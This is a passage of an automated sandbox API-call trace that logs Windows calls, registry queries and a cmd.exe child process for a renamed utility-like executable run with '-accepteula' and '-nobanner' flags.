\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0213.753] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0213.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿFà\x93õäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0213.754] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x80) returned 0x5891e8 [0213.910] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0213.910] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0213.911] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x5891e8) returned 0x80 [0213.911] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0213.912] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0213.912] GetCurrentProcess () returned 0xffffffff [0213.912] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0213.912] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0213.912] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0213.914] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0213.914] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0213.914] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0213.914] LockResource (hResData=0x43c648) returned 0x43c648 [0213.915] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x5896b8 [0213.916] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0213.938] GetLastError () returned 0x20 [0213.938] GetLastError () returned 0x20 [0213.938] SetLastError (dwErrCode=0x20) [0213.938] GetLastError () returned 0x20 [0213.938] SetLastError (dwErrCode=0x20) [0213.938] GetLastError () returned 0x20 [0213.938] SetLastError (dwErrCode=0x20) [0213.939] GetLastError () returned 0x20 [0213.939] SetLastError (dwErrCode=0x20) [0213.939] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5896d8 [0213.940] GetLastError () returned 0x20 [0213.940] SetLastError (dwErrCode=0x20) [0213.940] GetLastError () returned 0x20 [0213.940] SetLastError (dwErrCode=0x20) [0213.940] GetLastError () returned 0x20 [0213.940] SetLastError (dwErrCode=0x20) [0213.940] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0213.941] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0215.222] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5887b8 | out: hHeap=0x570000) returned 1 [0215.223] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0215.223] ExitProcess (uExitCode=0x1) [0215.224] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x587090 | out: hHeap=0x570000) returned 1 Process: id = "213" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1cd69000" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "173" os_parent_pid = "0x6b8" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"component.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 784 os_tid = 0xb34 [0214.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x43f9d4 | out: lpSystemTimeAsFileTime=0x43f9d4*(dwLowDateTime=0x38512c40, dwHighDateTime=0x1d68287)) [0214.737] GetCurrentProcessId () returned 0xac8 [0214.737] GetCurrentThreadId () returned 0xb34 [0214.737] GetTickCount () returned 0x1161ae1 [0214.737] QueryPerformanceCounter (in: lpPerformanceCount=0x43f9cc | out: lpPerformanceCount=0x43f9cc*=33507584879) returned 1 [0214.739] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0214.739] __set_app_type (_Type=0x1) [0214.739] __p__fmode () returned 0x770331f4 [0214.739] __p__commode () returned 0x770331fc [0214.739] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0214.739] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0214.739] GetCurrentThreadId () returned 0xb34 [0214.739] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb34) returned 0x60 [0214.739] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.739] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0214.739] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.740] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x43f964 | out: phkResult=0x43f964*=0x0) returned 0x2 [0214.740] VirtualQuery (in: lpAddress=0x43f99b, lpBuffer=0x43f934, dwLength=0x1c | out: lpBuffer=0x43f934*(BaseAddress=0x43f000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.740] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x43f934, dwLength=0x1c | out: lpBuffer=0x43f934*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0214.740] VirtualQuery (in: lpAddress=0x341000, lpBuffer=0x43f934, dwLength=0x1c | out: lpBuffer=0x43f934*(BaseAddress=0x341000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0214.740] VirtualQuery (in: lpAddress=0x343000, lpBuffer=0x43f934, dwLength=0x1c | out: lpBuffer=0x43f934*(BaseAddress=0x343000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.740] VirtualQuery (in: lpAddress=0x440000, lpBuffer=0x43f934, dwLength=0x1c | out: lpBuffer=0x43f934*(BaseAddress=0x440000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0214.740] GetConsoleOutputCP () returned 0x1b5 [0214.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0214.740] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0214.740] _get_osfhandle (_FileHandle=1) returned 0x80 [0214.741] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0214.741] _get_osfhandle (_FileHandle=1) returned 0x80 [0214.741] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0214.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.741] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0214.741] GetEnvironmentStringsW () returned 0x4d21e0* [0214.741] GetProcessHeap () returned 0x4c0000 [0214.741] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb82) returned 0x4d2d70 [0214.742] FreeEnvironmentStringsW (penv=0x4d21e0) returned 1 [0214.742] GetProcessHeap () returned 0x4c0000 [0214.742] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4) returned 0x4d2060 [0214.742] GetEnvironmentStringsW () returned 0x4d21e0* [0214.742] GetProcessHeap () returned 0x4c0000 [0214.742] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb82) returned 0x4d3900 [0214.742] FreeEnvironmentStringsW (penv=0x4d21e0) returned 1 [0214.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e8d4 | out: phkResult=0x43e8d4*=0x68) returned 0x0 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x0, lpData=0x43e8e0*=0x0, lpcbData=0x43e8d8*=0x1000) returned 0x2 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x1, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x0, lpData=0x43e8e0*=0x1, lpcbData=0x43e8d8*=0x1000) returned 0x2 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x0, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x40, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x40, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x0, lpData=0x43e8e0*=0x40, lpcbData=0x43e8d8*=0x1000) returned 0x2 [0214.743] RegCloseKey (hKey=0x68) returned 0x0 [0214.743] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e8d4 | out: phkResult=0x43e8d4*=0x68) returned 0x0 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x0, lpData=0x43e8e0*=0x40, lpcbData=0x43e8d8*=0x1000) returned 0x2 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x1, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x0, lpData=0x43e8e0*=0x1, lpcbData=0x43e8d8*=0x1000) returned 0x2 [0214.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x0, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.744] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x9, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.744] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x4, lpData=0x43e8e0*=0x9, lpcbData=0x43e8d8*=0x4) returned 0x0 [0214.744] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e8dc, lpData=0x43e8e0, lpcbData=0x43e8d8*=0x1000 | out: lpType=0x43e8dc*=0x0, lpData=0x43e8e0*=0x9, lpcbData=0x43e8d8*=0x1000) returned 0x2 [0214.744] RegCloseKey (hKey=0x68) returned 0x0 [0214.744] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2f1 [0214.744] srand (_Seed=0x5f51e2f1) [0214.744] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"component.exe\" -nobanner" [0214.744] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"component.exe\" -nobanner" [0214.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0214.745] GetProcessHeap () returned 0x4c0000 [0214.745] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x210) returned 0x4d4490 [0214.745] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d4498, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0214.745] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.745] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.745] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0214.745] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.745] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.745] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0214.745] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0214.745] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0214.745] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0214.745] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0214.745] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0214.745] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0214.745] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0214.745] GetProcessHeap () returned 0x4c0000 [0214.745] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x54) returned 0x4d46a8 [0214.746] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43f6a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0214.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x43f6a0, lpFilePart=0x43f69c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43f69c*="Desktop") returned 0x25 [0214.746] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0214.746] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x43f41c | out: lpFindFileData=0x43f41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4d2070 [0214.746] FindClose (in: hFindFile=0x4d2070 | out: hFindFile=0x4d2070) returned 1 [0214.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x43f41c | out: lpFindFileData=0x43f41c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4d2070 [0214.746] FindClose (in: hFindFile=0x4d2070 | out: hFindFile=0x4d2070) returned 1 [0214.746] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0214.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x43f41c | out: lpFindFileData=0x43f41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4d2070 [0214.746] FindClose (in: hFindFile=0x4d2070 | out: hFindFile=0x4d2070) returned 1 [0214.746] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0214.747] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0214.747] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0214.747] GetProcessHeap () returned 0x4c0000 [0214.747] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d2d70 | out: hHeap=0x4c0000) returned 1 [0214.747] GetEnvironmentStringsW () returned 0x4d21e0* [0214.747] GetProcessHeap () returned 0x4c0000 [0214.747] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb82) returned 0x4d2d70 [0214.747] FreeEnvironmentStringsW (penv=0x4d21e0) returned 1 [0214.747] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0214.747] GetProcessHeap () returned 0x4c0000 [0214.747] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d46a8 | out: hHeap=0x4c0000) returned 1 [0214.747] GetProcessHeap () returned 0x4c0000 [0214.747] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x400e) returned 0x4d4f08 [0214.748] GetProcessHeap () returned 0x4c0000 [0214.748] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x72) returned 0x4d8f38 [0214.748] GetProcessHeap () returned 0x4c0000 [0214.748] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d4f08 | out: hHeap=0x4c0000) returned 1 [0214.748] GetConsoleOutputCP () returned 0x1b5 [0214.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0214.748] GetUserDefaultLCID () returned 0x409 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x43f7e0, cchData=128 | out: lpLCData="0") returned 2 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x43f7e0, cchData=128 | out: lpLCData="0") returned 2 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x43f7e0, cchData=128 